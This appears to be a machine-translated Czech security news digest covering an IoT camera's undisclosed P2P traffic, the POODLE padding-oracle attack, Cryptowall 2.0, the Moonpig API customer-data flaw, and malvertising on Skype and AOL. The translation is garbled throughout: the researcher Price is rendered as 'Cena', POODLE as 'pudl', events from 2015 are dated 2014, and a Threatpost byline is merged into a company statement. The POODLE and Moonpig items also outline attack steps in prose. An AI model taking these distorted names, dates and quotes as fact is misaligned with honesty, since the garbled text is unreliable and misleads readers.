5 admin 0 SW <[kthread]
6 admin 0 SW <[kblockd / 0]
7 admin 0 SW <[kswapd0]
8 admin 0 SW [pdflush]
9 admin 0 SW [pdflush]
10 admin 0 SW <[AIO / 0]
11 admin 0 SW [mtdblockd]
18 admin 1084 S nvram_daemon
19 admin 1612 S goahead
20 admin 872 R RDTServer
24 admin 1400 R telnetd
26 admin 872 S RDTServer
27 admin 872 S RDTServer
33 admin 872 S RDTServer
34 admin 872 S RDTServer
35 admin 872 S RDTServer
36 admin 872 S RDTServer
53 admin 1400 S / bin / sh
238 admin 0 SW [RtmpCmdQTask]
239 admin 0 SW [RtmpWscTask]
366 admin 1400 S SH
505 admin 1400 R ps
678 admin 1400 S udhcpd /etc/udhcpd.conf
1116 admin 1396 S udhcpc -i apcli0 -s /sbin/udhcpc.sh -p / var / run / udhcp
1192 admin 872 S RDTServer
1207 admin 772 S NtpClient -s -c 0 -h ntp.belnet.be -i 86400
#
Popadl jsem kopie RDTServer binární (Mips) a pomocí "řetězců" příkaz proti souboru odhalil zajímavé věci. Použité IP adresy byly nalezeny v binární:
IP FQDN síťový_název Country
50.19.254.134 m1.iotcplatform.com AMAZON-EC2-8 US
122.248.234.207 m2.iotcplatform.com Amazon EC2-SG Singapore
46.137.188.54 m3.iotcplatform.com AMAZON-EU-AWS Irsko
122.226.84.253 Jinhua -MEIDIYA-LTD Čína
61.188.37.216 ChinaNET-SC Čína
220.181.111.147 ChinaNET-IDC-BJ Čína
120.24.59.150 m4.iotcplatform.com ALISOFT Čína
114.215.137.159 m5.iotcplatform.com ALISOFT Čína
175.41.238.100 AMAZON-AP-RESOURCES- JP Japan
Vidět pakety odeslané do Číny, je často podezřelé! Název domény iotcplatform.com patří ThroughTek, společnost specializující se na internetu věcí a M2M ("Machine to Machine") připojení platformy:
IOTCPLATFORM.COM: Domain Name
ID registru domény: 1665166563_DOMAIN_COM-VRSN
kanceláře WHOIS Server: whois.godaddy.com
kanceláře URL: http://www.godaddy.com
aktualizace: 2014-07-09T11: 44: 15Z
Datum vytvoření: 2011 -07-04T08: 50: 36Z
Registrátor Registrace Datum ukončení platnosti: 2016-07-04T08: 50: 36Z
kanceláře: GoDaddy.com, LLC
kanceláře IANA ID: 146
Registrátor zneužití Kontaktní e-mail: abuse@godaddy.com
kanceláře Zneužívání Kontaktní telefon: + 1.480-624-2505
registru o registraci ID:
Žadatel Jméno: Charles Kao
o registraci organizace:
Žadatel Ulice:. 4F, No.221, Chongyang Rd,.
Žadatel Město: Taipei
Žadatel Stát / Provincie: Nangang District
Žadatel PSČ: 11573
Země o registraci: Tchaj-wan
o registraci Telefon: 886,886226535111
Žadatel Phone Ext:
Žadatel Fax:
Žadatel Fax Ext:
Žadatel Email: justin_yeh@tutk.com
Ve skutečnosti, platforma IOCT je služba, vyvinutý ThoughTek navázat P2P komunikaci mezi zařízeními. Četl jsem v dokumentaci dodané se zařízením, stejně jako všichni na webovou stránku, a není tam žádná zmínka o této služby. Výrobci by měli zahrnovat některé technické dokumentace o požadavcích na sítě (ex: stahovat aktualizace firmwaru). V tomto případě to není hlavní problém se zabezpečením, ale tento příběh se prosazuje to, co už víme (a bát se) o internetu věcí: tato zařízení mají slabou konfiguraci a nedostatek viditelnosti / dokumentace o jejich chování. Buďte opatrní při připojování je na vaší síti. Nejvhodnější je kontrolovat provoz, které generují jednou on-line (DNS dotazy, HTTP (S) žádost nebo jakýkoli jiný protokol), - ". Je-li nepřítel ponechává dveře otevřené, musíte spěchat do" - Sun Tzu PGP klíč: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x42D006FD51AD7F2C
Některé protokoly a / nebo pakety, prosím?
9.1.2014 Hrozby
Ahoj, pokud máte nějaké protokoly z těchto podsítí k infrastruktuře a budete moci sdílet, mohl bys?
61.174.51.0/24 (i když si vezmu / 16)
218.2.0.0/24
122.225.0.0/16
112.101.64.0/24
103.41.124.0/24
61.240.144.0/24
Pokud nemůžete sdílet protokoly nebo pakety, možná byste mi mohl poslat zdrojovou IP a cílový port. (Použijte kontaktní formulář nebo pošlete jim přímo na markh.isc (at) gmail.com)
Výše uvedené jsou aktivní na SSH a DNS, jen se snaží zjistit, jestli tam je něco jiného, a pokud ano, jaké a v jaké části světa.
Pozdravy
Značka
Poznámka: Díky za všechny informace dosud velmi ceněn, aby to přijde. Pokud odesláním souboru, prosím e-mailem přímo do markh.isc (at) gmail.com jako kontaktní formulář soubor zařízení má problém. To se podíval na, ale v mezidobí použijte prosím e-mailovou adresu.
Microsoft pokročilé změny Notification Service.
9.1.2014 Software
Poměrně málo z vás psali v dejte nám vědět, že Microsoft mění způsob, jakým poskytovat informace (díky vám všem). Můžete si přečíst celý blog zde -> http://blogs.technet.com/b/ msrc /archive/2015/01/08/evolving-advance-notification-service-ans-in-2015.aspx
Stručně řečeno, pokud chcete být upozorněni předem Nyní je třeba se zaregistrovat, vybrat použitých výrobků a budete pak mít k dispozici informace týkající se opravy, které budou uvolněny. Jste-li přední zákazník váš technický kontakt může poskytnout informace.
Hlavním bodem pro mě je to jedno
" Do budoucna, budeme poskytovat ANS informace přímo zákazníkům vlády a současných organizací zapojených v našich bezpečnostních programů, a nebude již tuto informaci plně k dispozici prostřednictvím stránky blog poštovní a web "
Nyní mnoho z nás se podívat na tyto informace plánovat jejich další záplatování cyklu. Takže budete muset podívat na tohoto procesu a zjistit, co je třeba změnit. Budete se muset spolehnout na informace ve vašem strakatostí řešení, nebo se zaregistrujte.
Zaregistrovat se můžete zde: http://mybulletins.technet.microsoft.com/
Přístrojová deska, která je vytvořena na konci vypadá hezky, ale pro mě příliš brzy říci, jak užitečné je to v této fázi, i když to bylo trochu bolestivé přezkoumat každou bulletin. Bude to trvat několik opravných cyklů to všechno vyřešit Řekl bych, že. 
Takže do budoucna bude muset upravit, jak identifikovat patche, které se použijí přímo ve Vašem prostředí. Pokud nechcete registrovat stačí navštívit hlavní bulletiny stránky zde -> https://technet.microsoft.com/en-us/library/security/dn631937.aspx
Tato stránka obsahuje seznam všech bulletiny vydání.
Ředitel FBI věří, Severní Korea byla za Sony hack, stále nabízí žádný důkaz
9.1.2014 Incidenty
Ředitel FBI James Comey vystoupil na mezinárodní konferenci o počítačové bezpečnosti, čtyřdenní akce koordinované FBI na Fordham University School of Law v New Yorku. Když koncem loňského roku FBI poskytla aktualizaci na jejich vyšetřování Sony Pictures Entertainment hack, že prsty na severokorejskou vládu jako iniciátor. Předsednictvo tvrdil, že je "významný přesah mezi infrastrukturou používané v tomto útoku a dalšími škodlivými kybernetického činnost americká vláda již dříve spojené přímo do Severní Koreje," že malware použitý v Útok má podobnosti (řádky kódu, šifrovací algoritmy, metody pro mazání dat, atd), na které dříve vázáno na severokorejských herci, a že nástroje používané v tomto útoku, jsou podobné těm, které používají v kybernetickými útoky proti jihokorejským bank a médií vývody, věřil být provedeny severokorejských hackery. Přesto, oni řekli, že nebudou zveřejňovat skutečné důkazy, protože by to odhalit organizace (a NSA je) vyšetřovací metody, intelligence a zdroje, stejně jako informovat Severní Korea , jeho zranitelných míst Pohledávky nejsou uklidnil bezpečnostní komunitu - mnozí nejsou připraveni uvěřit americkou vládu bez důkazu. Jak dobře-pokládaný počítačové bezpečnosti expert Bruce Schneier nedávno zdůraznil, "americká historie je plná příkladů utajovaných informací, směřující k nám k agresi proti jiným zemím, myslíte, že zbraně hromadného ničení, jen aby později se dozvěděli, že důkaz byl v pořádku." Ve středu, v Mezinárodní konference o kybernetické bezpečnosti konala na Fordham University Law School v New Yorku, ředitel FBI James Comey se pokusil přidat váhu svého slova pro nároky. "Mám velmi vysokou důvěru v tento přičítání, stejně jako celou zpravodajskou komunitu," řekl publiku. Nabídl žádné další důkazy, které by ho podporovat, omezit nové odhalení na tvrzení, že útočníci dostali nedbalé několikrát, a nevyužila proxy servery při připojování na servery Sony, odhalující ní vyplývající jejich skutečné IP adresy - IP adresa přidělené do Severní Koreje. Podle něj se útočníci také navštívili ze stejné IP adresy účet Facebook, jehož prostřednictvím poslali výhružné zprávy společnosti Sony. V komentáři k skepticismu bezpečnostní komunity, on říkal, že nemají všechna fakta. "Nevidí, co vidím já," řekl. Ale to je přesně to bezpečnostní experti bod po celém světě se snaží, aby se, a dále poukázat. "Různé IP adresy byly spojeny s tímto útokem, z hotelu Tchaj-wanu na IP adresy v Japonsku. Každá IP adresa připojení k internetu může být ohrožena a použity útočníky, " komentoval INFOSEC profesionální Brian honan . Všichni ve všech, Comey (a vláda USA) se nenabízí žádné důkazy pro své závěry. Jsou i nadále říkat "Věřte nám ! ", a pokud jsou nadále naříkat nedůvěry v kybernetické bezpečnosti Společenství. Do té doby, Obamova administrativa použila pohledávky jako ospravedlnění pro nové sankce, které uvalených proti severokorejské vlády. Oni také popíral, že nesouvisí s nedávnému výpadku ovlivňující Severní Koreje připojení k internetu.
Stav Internet: Útok provozu, DDoS, IPv4 a IPv6
9.1.2014 Počítačový útok
Akamai dnes zveřejnila svou nejnovější stát internetu zprávy , která poskytuje vhled do klíčových globálních statistik, jako je rychlost připojení a širokopásmové technologie napříč pevných a mobilních sítí, celková útoku dopravy, globální 4K připravenost a vyčerpání IPv4 a IPv6 realizace. Útok provoz a bezpečnost Akamai udržuje distribuované sadu budoucnu nebyly propagovány agentů nasazených přes internet přihlásit připojení pokusů, že společnost označuje za útok provozu. Na základě údajů získaných těmito látkami základě Akamai je schopen identifikovat horní země, ze které napadají provoz pochází, stejně jako top porty jsou cílem těchto útoků. Je důležité poznamenat, že země původu, jak je stanoveno podle zdrojové IP adresu nemusí reprezentovat národ, ve kterém útočník nachází.
Ve třetím čtvrtletí roku 2014, Akamai pozorovat útoku provoz pocházející z 201 unikátních zemí / regionů, který byl výrazně vzrostla z 161 ve druhém čtvrtletí, a více v souladu s 194 vidět v prvním čtvrtletí. Jak se ukázalo v předchozích zprávách, nejvyšší koncentrace útoků (50%) pochází z Číny, je téměř třikrát vyšší než ve Spojených státech, který viděl pozorované provoz růst o přibližně 25% čtvrtletí více než čtvrtinu. Čína a Spojené státy byly jen dvě země, které pocházejí z více než 10% z pozorovaného globálního útoku provozu. Indonésie byla jedinou zemí, mezi top 10 pro zobrazení pozorovaného útok provozu pokles, pád z 15% celosvětového útoku provozu ve druhém čtvrtletí na 1,9% ve třetím, celková koncentrace pozorovaných útoku provozu ve třetím čtvrtletí mírně snížil, s top 10 zemí / regionů původní 82% pozorovaných útoků, oproti 84% v předchozím čtvrtletí. Kromě toho 64% z útoku dopravy pochází z asijsko-pacifickém regionu, dolů z 70% v loňském čtvrtletí, zatímco nejnižší objem (1%), pochází z Afriky. Objem pozorované provozu zaměřeného na porty 80 (HTTP / WWW), 443 (HTTPS / SSL) a 880 (HTTP Alternate), se výrazně snížil ve třetím čtvrtletí, přičemž všechny tři porty vidět zlomek objemu útoku jako v předchozích čtvrtletích. Port 23 zůstal nejoblíbenějším terčem útoků pozorovaných za pocházející z Číny, což představuje více než třikrát větší objem než port 80, druhý nejvíce napadl přístav v zemi. Hlášeny DDoS útok dopravní zákazníci Akamai hlášeno 270 DDoS útoky na druhé čtvrtletí v řadě. Celkově to představuje snížení o 4,5% útoků od začátku roku 2014 a pokles o 4% ve srovnání se třetím čtvrtletím roku 2013.
Na rozdíl od zprávě druhého čtvrtletí, počet útoků klesl v obou Amerik, s 142 útoků, a v regionu EMEA, s 44 útoků. Nicméně, počet útoků v asijsko-tichomořské oblasti vzrostly o 25% oproti předchozímu čtvrtletí 84. distribuce průmyslu nezměnil ve srovnání s předchozím čtvrtletím; obchod, podnikání, high tech, média a zábavu, a veřejný sektor všichni viděli stejný počet útoků, jako v předchozím čtvrtletí, a to i přesto, že skutečné cíle těchto útoků změnil. Ve srovnání se stejným čtvrtletím roku 2013, podnikových útoky klesly o více než třetinu z 127 na 80. Současně, útoky proti high-tech společností, které ztrojnásobil 14-42. Akamai došlo ke zvýšení počtu opakovaných útoků proti stejný cíl ve třetím čtvrtletí, se vracet k 25% šanci na pozdější útoku, jehož cílem stejné organizaci. To představuje pokles unikátních cíle z 184 ve druhém čtvrtletí na 174 ve třetím. IPv4 a IPv6 ve třetím čtvrtletí roku 2014, více než 790.000.000 IPv4 adres připojených k Intelligent Platform Akamai z více než 246 unikátních zemích / oblastech. Globální Počet unikátních IPv4 adres dělat požadavky na Akamai vzrostl o téměř dva miliony čtvrt-over-čtvrtletí nominální nárůst po ztrátě sedmi milionů v druhém čtvrtletí. Podíváme-li se na top 10 zemí ve třetím čtvrtletí, jedinečný počet IP ve Spojených státech viděl malou zisk zhruba 20.000 adres. Kromě Spojených států, Brazílie, Francie a Rusko viděl nominální nárůst unikátních adres IPv4 se počítá, zatímco zbývajících šest zemí viděl jedinečný IPv4 adresa počty mírně klesat od druhého čtvrtletí. Padesát osm procent zemí viděl čtvrtletí oproti čtvrtletí nárůst unikátních adres IPv4 se počítá, s 28 zemích / oblastech rostou o 10% a více. Cable and Wireless poskytovatelé i nadále řídit počet IPv6 žádosti podané k Akamai, mnoho které vede cesta k zavádění IPv6 ve svých zemích. Verizon Wireless a Brutélé viděl více než polovina jejich požadavků na Akamai vyrobený přes IPv6, s Telenet blízko za sebou.
Ohrožena pověření v podnikových cloudových aplikací
9.1.2014 Hrozby
Nová zpráva Netskope vykazuje trvalý růst cloud použití app přes podniků, stejně jako velké množství, ve kterém jsou soubory sdílena mimo dané organizace.
Nejvíce pozoruhodně, tolik jako 15 procent podnikových uživatelů měli své pověření ohrožena. Vzhledem k tomu, až do poloviny uživatelů pro opětovné použití hesla pro více účtů, pravděpodobnost uživatelů přihlášení do kritických podnikových aplikací s těmito pověření je vysoká, uvedení obchodně citlivé údaje v ohrožení. Podniky i nadále přijímat cloudových aplikací rychlým tempem, s průměrem 613 cloudových aplikací na organizaci ve 4. čtvrtletí, a to až z 579 v předchozím čtvrtletí. Závěry zprávy jsou založeny na desítky miliard oblačných app událostí, které vidíte přes miliony uživatelů mezi říjnem a prosincem 2014. Zpráva zjistila, více než 20 procent organizací v Netskope cloudu aktivně využívat více než 1000 cloudových aplikací, a osm procent souborů v podnikové-schválil cloudového úložiště aplikace jsou v rozporu s DLP politik, včetně PHI, PCI, PII, zdrojový kód, a dalších politik týkajících se důvěrných nebo citlivých dat. Vzhledem k výraznému nárůstu úniků dat a úniky z celé řady významných společností, webové stránky, a cloud aplikace, rostoucí počet uživatelů se přihlásit do které byly odcizené jako součást datového hack nebo vystavení obchodní aplikace pomocí narušenou pověření. Až 15 procent uživatelů měli své pověření ohrožena v expozici předchozím dat, a mnohé z těchto uživatelů opakovaně používat hesla i pro přihlášení do aplikace, které obsahují informace o podnikání a malá písmena.
Hodnocení rizika pudl
8.1.2015 Rizika
Jeden z největších oznámení zabezpečení v minulém roce bylo určitě POODLE (Padding Oracle On degradoval Legacy Encryption) zranitelnosti, což znamenalo skutečný konec SSLv3. V kontrastu s mnoha dalšími dříve zjištěných slabých míst v šifrovacích algoritmů používaných SSLv3, tato zranitelnost je životaschopný, a může být zneužita bez skákání přes příliš mnoho překážek, nebo vyžadující velké zdroje - POODLE zranitelnost je skutečný.
I když to zvedl trochu paniky (v některých případech panika byla odůvodněna), ale také zvýšil trochu prachu tam, kde by neměl. Cílem tohoto deníku je tedy jasné, co se trochu, aby vám umožní provést řádné posouzení rizika na odklon od SSLv3 - prosím, přidávat komentáře a své zkušenosti (a případné opravy, pokud najdete chyby).
Trochu opakovací
Za prvé, i když, trochu opakovací o tom, jak POODLE zranitelnost funguje. Původní kniha je k dispozici na https://www.openssl.org/~bodo/ssl-poodle.pdf , ale já vám vysvětlí pár detailů, které jsou, podle mého názoru, zásadní význam pro tento útok a že možná nebyly namáhané tak, jak by měly mít v tomto dokumentu (můj osobní názor je, že kroky týkající se útoku měl být lépe vysvětlit, protože to by umožnilo lidem snadno posoudit rizika).
Existuje chyba v tom, že, je-li použit CBC šifrovací algoritmy, SSLv3 nezahrnuje výplň MAC (Message Authentication Code). Navíc (a to je klíč), v případě, že je celý blok polstrování, SSLv3 kontroluje pouze poslední byte v čalounění bloku. Všechny ostatní, předchozí bytů v tomto bloku jsou ignorovat a hodnota posledního bajtu musí být roven velikosti bloku (tj 15, pokud je velikost bloku je 16 bajtů).
Pokud útočník chce zneužít tuto chybu zabezpečení, nejprve musí provést následující akce:
Úspěšně spustit útok typu man-in-the-Middle proti oběti,
Nižší verzi připojení k SSLv3, pokud TLS je používán také, například,
Pokud výše uvedené byly splněny požadavky, útok je poměrně jednoduchý, a útočník musí udělat následující:
Umístěte byte chce získat zpět jako poslední byte bloku. To je zásadní požadavek, jak uvidíme později.
Zkopírujte tento blok jako poslední (čalounění) bloku.
Teď útočník používá server jako orákulum v závislosti na přijaté zprávy zpět. Server se pokusí dešifrování zprávy a při dešifrování poslední blok, vzhledem k CBC šifrovací algoritmus, po dešifrování, bude poslední bajt být XOR-ed s poslední bajt z předcházejícího bloku. Jak jsme použili celý blok polstrování, útočník ví, že výsledkem tohoto procesu musí být 15. Jinými slovy, v případě, že dekódování bylo úspěšné, útočník může získat prostého textu hodnotu tohoto bytu, protože může snadno vypočítat: dešifrovat byte = 15 XOR (poslední byte předchozího bloku).
Jak útočník vědět, jestli dešifrování byl úspěšný? Je to jednoduché: tím, že sleduje síťový provoz ze serveru:
V případě, že dešifrování selhal (což znamená, že výsledek nebyl 15), bude útočník vidět Alert kód 21, což znamená "dešifrování selhal" (popis říká: dešifrování záznamu TLSCiphertext dešifrována v neplatném způsobem: buď to bylo Není ani násobkem délky bloku nebo jeho čalounění hodnot, kdy kontrolovány, nebylo správné. Tato zpráva je vždy smrtelná.)
V případě, že dešifrování byl úspěšný, útočník může dešifrovat byte. Akce, která požadavek způsobí nezáleží.
Všechny útočník musí udělat, je způsobit, oběť vydat více požadavků. V průměru - bude potřebovat 256 požadavek na dešifrovat jeden byte (ale všimněte si, že to může trvat ho mnohem více - či méně žádostí dělat to). Tím, což oběť vydat libovolné požadavky, útočník dešifruje jeho žádané údaje (obvykle cookie relace ve webových aplikacích), byte po bytu.
Praktičnost pudla útoků
Jak můžete vidět v předchozí části, je zde řada požadavků, které útočník musí splnit, aby mohl vykonat pudl útoky. Jedním z nejdůležitějších je, aby otázku oběť libovolné požadavky na server. Útočník musí nějak být schopen ovlivnit tyto požadavky - byte chce dešifrovat, musí být poslední byte v bloku.
U webových aplikací je to poměrně jednoduchá - protože útočník musí být v pozici MITM tak jako tak, že může dělat oběti vydává prohlížeč tyto zvláštní požadavky (pro více informací viz originální papír).
Nicméně, a to je zásadní bod, posuzování rizika pudl - co se stane v případě, že útočník nemůže ovlivnit takové žádosti? No, podle aktuálních informací, bude schopen dešifrovat pouze jednoduché předem umístěn bytů.
I když je to stále špatně, riziko může být nižší, než se standardní webové aplikace. A to je hlavním bodem posuzování rizika: v posledních několika měsících jsem viděl příliš mnoho případů, kdy auditor (nebo penetrace testeru) běžel nástroj, který oznámil, že SSLv3 je povoleno, a slepě označené jako kritickou zranitelnost které musí být zmírněny co nejdříve.
Jedním z typických případů těchto zjištěních jsou client-server aplikací, které používají SSLv3 pro ochranu dat, ale neumožňují útočníkovi upravit požadavky (například: monitorovacích systémů). Takové systémy vždy vydat stejné požadavky, a to automaticky, takže útočník nemůže změnit požadavek (textová verze) to, jak se může s webovými aplikacemi.
Tak, aby zabalit toto již dlouho deník - vždy správně zhodnotit rizika a nepřijímají výsledky automatizovaných skenerů naslepo. Zatímco POODLE zranitelnost je opravdu těžké a kritické zranitelnosti, a měli bychom se přestěhovat do TLS (v1.2-li to možné), by měla být migrace představila a pečlivě naplánované.
Vnitřní Cryptowall 2,0 ransomware
7.1.2014 Virus
Pokud potřebujete více důkazů, že ransomware je zde k pobytu, a může se do zbraně Počítačoví zločinci "volby, nehledejte nic jiného než Cryptowall.
Výzkumníci z Talos skupiny Cisco dnes zveřejnila analýzu o 2,0 vzorku Cryptowall, peeling zpět mnoho vrstev známých komodit kolem této hrozby, jako je jeho použití v síti Tor anonymity zamaskovat příkazové a-Control komunikaci. Ale možná ještě vyprávění o závazku kolem ransomware je investiční útočníky provedené v jeho schopnosti odhalit výkon ve virtuálních prostředích, stavební v mnoha fázích dešifrování současné době před ransomware aktivuje, a jeho schopnost detekovat 32- a 64-bitové architektury a provádění různé verze pro každého.
"Prošli hodně práce skrýt spustitelný v šifrování, zkontrolovat, zda je to běh ve virtuálním stroji a možnost využívat více prostředí," řekl Talos výzkum v oblasti bezpečnosti inženýr Earl Carter. "Tolik se do Cryptowall 2.0. Někdo šel hodně práce na přední straně, aby se zabránilo odhalení. "
Cryptowall se objevil v blízkosti před rokem a útočníci použili ji vytvořit pozoruhodné zisky . Na rozdíl od první generace ransomware, které by zamknout počítač a vytvářet falešnou zprávu informující oběť jeho stroj byl zabaven kvůli nezákonných on-line aktivit, Cryptowall a jeho bratranec Cryptolocker zvyšoval ante a šifrované soubory na napadených počítačů. Malware požaduje výkupné za dešifrovací klíč k obnovení dat uživatele, klíč, který mnohokrát není doručena, i když výkupné je rozeklaný nad.
Taková ransomware je dodáván nejčastěji přes phishing kampaní nebo odkazy na webové stránky hosting využít výstroje . U konkrétního analyzovaného vzorku Cisco, způsob infekce byla loni v létě Windows TrueType font-rozebrat zranitelnost , která umožňuje zvýšení privilegií na stroji. Kapátko byl postaven pro 32-bitové stroje, ale může také přišel s 64-bit DLL, která by mohla spustit na počítačích se systémem Windows AMD, řekl Carter.
"Tenhle se od nejlepší z obou světů; to by se začít s 32-bit využití, které by mohly využít také 64-bitové procesory AMD. Už jen to, že to bylo tak bezproblémové, že to mohlo tam a zpět mezi dvěma však potřeba byl pozoruhodný, "řekl Carter. "Normálně se to dělá jedno nebo druhé."
Zpráva Cisco do velkých detailů o fázích různých dešifrovací rutiny používaných Cryptowall 2.0, to vše ve jménu vyhnout detekci antimalware a Intrusion Detection software.
"Je to docela jednoduchá kontrola hledá společný spustitelný pro VMware nebo (Oracle) VirtualBox," řekl Carter. "Pokud se zjistí buď, že předpokládá, že je ve virtuálním pískovišti a nebude provádět. V tomto bodě, nemáte ani tu [Cryptowall] kód, jen kapátko a ne ve skutečnosti Cryptowall binární, které budou spuštěny.
"Každý má pískoviště ve virtuálním prostředí, a snaží se zabránit tomu, aby počáteční odhalení, takže to nebude vyskočí a spustit na pískovišti," řekl Carter. "Je těžké určit vzorku jako malware, a je tu šance, že bude proklouznout a zaútočit na více systémů."
News, že Cryptowall používal Tor pro velení a řízení se objevily na podzim, i když to nebylo poprvé, aby tak učinily . Malware a jiné podvody jsou stále přítomny na Tor, který skrývá původu IP adresu paketu.
"Použití Torovi jen ztěžuje identifikaci velení a řízení na zadním konci," řekl Carter. "Není to jasné, že je to příkaz-and-control provoz bude v síti. Uvidíte Tor provoz, ale můžete se dostat do základní informace, vidět rozdíl. "
Moonpig API Vulnerability vystaví platební karty data
7.1.2014 Zranitelnosti
Moonpig, UK-založená společnost, která prodává osobní pohlednice, hrnky, trička a další novinky, byl převezen do kůlny pro chudé postupy zabezpečení výzkumníkem, který tvrdí, že je to jednoduché ukrást uživatele a platební karty dat přes rozviklanou mobil app API.
Společnost dnes ráno řekl, že jeho Threatpost aplikace budou k dispozici, když to vyšetřuje problém.
"Jsme si vědomi tvrzení dnes ráno, pokud jde o bezpečnost dat zákazníka v rámci našich aplikací," řekl zástupce Moonpig. "Můžeme vás ujistit naše zákazníky, že všechny hesla a platební údaje jsou a vždy byla v bezpečí. Bezpečnost vašich zážitek z nakupování v Moonpig je pro nás velmi důležitá a my se vyšetřuje detail za dnešní zprávě jako prioritu. "
Tak tomu může být, ale výzkumník Paul Cena, který včera zveřejněny zející díry v Moonpig.com, řekl, že před 17 měsíci oznámil záležitost firmy na 18.srpna 2013,.
"Po několika e-mailů tam a zpět, jejich uvažování byl kód dědictví a oni si" si hned na to, '"Cena napsal ve svém zveřejnění . Následné e-mailové konverzace s Moonpig v září odhalila problém zůstal nevyřešen, ale bylo by "před Vánocemi," řekl Price. Včera se rozhodl Moonpig měl dost příležitostí, aby tento problém vyřešit.
"Původně jsem chtěl počkat, až budou stanovena jejich živá koncové body, ale vzhledem k časové horizonty jsem se rozhodl publikovat tento příspěvek donutit Moonpig opravit problém a chránit soukromí svých zákazníků (kdo ví, kdo ještě ví o tom!), "napsal cena. "17 měsíců je více než dost času, jak opravit problém takhle. Zdá se, že osobní údaje zákazníka není prioritou Moonpig. "
Ceny díla se točí kolem aplikace pro Android a žádostmi na API Moonpig je. Cena citoval řadu otázek kolem očí bijící nedostatek autentizace a schopností manipulovat ID zákazníka vrácené prostřednictvím URL parametr, který by mohl útočníkovi umožnit teoreticky naučit osobní i platební informace pro každého z Moonpig tří milionů zákazníků.
"Uhodil jsem se uživatelům vyzkoušejte několik stokrát v rychlém sledu, a nebyl jsem na míře," řekl Price. "Vzhledem k tomu, že ID zákazníků jsou sekvenční útočník by si to velmi snadné vybudovat databázi zákazníků Moonpig spolu s jejich adresami a detaily karty během několika hodin. - Velmi děsivé opravdu"
Vzhledem k tomu, tuto schopnost zosobnit uživatele pomocí postupných ID zákazníka, Cena řekl útočník mohl získat profil a karty informace, místo a prostudujte objednávky a další. Poznamenal také, API metoda s názvem GetCreditCardDetails kterou používaných při testu identifikace zákazníka, který vytvořil, který se vrátil poslední čtyři číslice číslo karty, datum expirace a jméno klienta.
Cena také experimentoval s snaží najít skryté metody API zasláním neznámou metodu. To, co se dostal na oplátku byl 404 s odkazem na stránky nápovědy se seznamem všech Moonpig které jsou k dispozici metody a popisy každého.
"Stránka nápovědy také odhaluje své vnitřní nastavení sítě DNS, ale to je jiný příběh," řekl Price.
On to na vědomí, že API podporuje OAuth 2.0 povolení, které by zacelil mezeru.
Moonpig neposkytl časový plán pro získání jejích aplikací on-line, a řekl, že jeho pracovní plochy a mobilních staveništích nebyly ovlivněny.
Uživatelé hlásí Škodlivé reklamy ve Skype
7.1.2014 Incidenty
Někteří uživatelé Skype pozorovali škodlivé reklamy uvnitř svých klientů Skype v posledních dnech, které vedou na stránky, které se snaží stáhnout falešný Adobe nebo Java aktualizace.
Uživatelé ve Společenství fórum Skype v pondělí řekl, že byly vidět bannerové reklamy, která, pokud klikli na, povede k riskantní stránky, které se snaží nainstalovat software, který je skrytou buď jako Adobe či Java aktualizace. To je běžná taktika útočníků pomocí škodlivého reklamy v různých kontextech. Často se bude snažit lákat uživatele ke kliknutí na reklamu nebo odkaz tím, že říká, že je třeba aktualizovat společný kus softwaru, často Adobe Flash, Java nebo QuickTime.
V tomto případě, reklamy se objevují v Skype klientů uživatelů, informuje, že nějaký obsah vyžaduje aktualizaci Adobe. Text reklamy má nějaké překlepy, a není opravdu vypadat jako dialogovém okně, které Flash by uváděly uživatele. Ale pro uživatele, kteří mohou být obeznámeni s pravými aktualizace mechanismy, mohlo by to být účinné. Uživatelé ve Skype fóru řekl, že na odkaz v reklamě se oběti na stránky, které se snaží nainstalovat aplikaci na svých strojích.
"Neklikejte na reklamu !! Bude to trvat vás na webu předstírat, že je Adobe a pokusu o stažení virů do počítače, "člen pomocí názvu DavidR6 uvedl v příspěvku na fórum Skype .
Skype komunita manažer doporučil, aby uživatel spustit Fiddler stopy na provoz z počítače na webu zjistit, co přesně cesta byla.
"Pokud stále vidíte tento problém můžete nám pomoci tím, že tzv" Fiddler stopu ". To zahrnuje stopu webových zdrojů přístupné, pokud je tato reklama otevření stránky. To nám pomůže potvrdit nebo vyloučit, zda Skype reklama je vlastně příčinou chování, které popsal v tomto tématu, "napsal ředitel.
Mnoho velkých webových vlastnosti a aplikace používají pro publikování sítě k zobrazování reklam uživatelům, ale není jasné, zda se Skype používá syndication sítě.
Žádost o komentář zaslána Skype, který je ve vlastnictví společnosti Microsoft, se nevrací.
Malvertising kampaně Používá AOL Ad Network, vede k Exploit Kit
7.1.2014 Viry
Vědci objevili na malvertising kampaň běží na pár míst ve vlastnictví Huffington Post, který je pomocí reklamy distribuované prostřednictvím reklamní sítě AOL. Útok posílá oběti prostřednictvím řady přesměrování, které nakonec přivedlo na vstupní stránku, která je spuštěna zneužít kit.
Kampaň se objevila na prvním místě huffingtonpost.ca na 31 výzkumných pracovníků prosince a od bezpečnostní firmy Cyphort brzy zjistil, že je na hlavní stránce Huffington Post ve Spojených státech. Vědci zjistili, že kampaň pochází od reklamy se podává prostřednictvím Advertising.com sítí AOL, a jakmile uživatel klikl na škodlivém reklamu, ona byla přesměrována prostřednictvím řady chmele, některé pomocí HTTPS, dokud se trefil vstupní stránku. Že strana obsahovala zneužít kit, který sloužil jak skript využije Flash a VB.
Stránky přistání se zdají být ohroženy polské stránky.
"Je zajímavé útočníci použili kombinaci HTTP a HTTPS přesměrování skrýt servery zapojené do tohoto útoku. HTTPS Přesměrovač je umístěn na stránce Google App Engine. Tím analýzu založenou na dopravní PCAPs obtížnější, protože protokolem HTTPS je šifrována, "Cyphort analýza říká o útoku. AOL podnikla kroky k vypnutí kampaň.
"Zdá se, že tato skupina ohrožena a / nebo má přístup k více .PL domén v Polsku, a že je přesměrování přes sub-domén na těchto stránkách (nysa.pl, klodzko.pl, atd)."
Malvertising kampaň rozšířena na řadu dalších míst mimo domén Huffington Post, uvádějí vědci, a využívat kit použitý v útoku se zdá být Neutrino kit . Infekce začíná útokem Javascript a pak kód dešifruje HTML soubor a soubor VB skriptu. Soubor HTML je načten v iframe, vědci řekli, a využívá starou zranitelnost, CVE-2013-2551 use-po-bez chyby v Internet Exploreru. VB skript stáhne škodlivý spustitelný soubor.
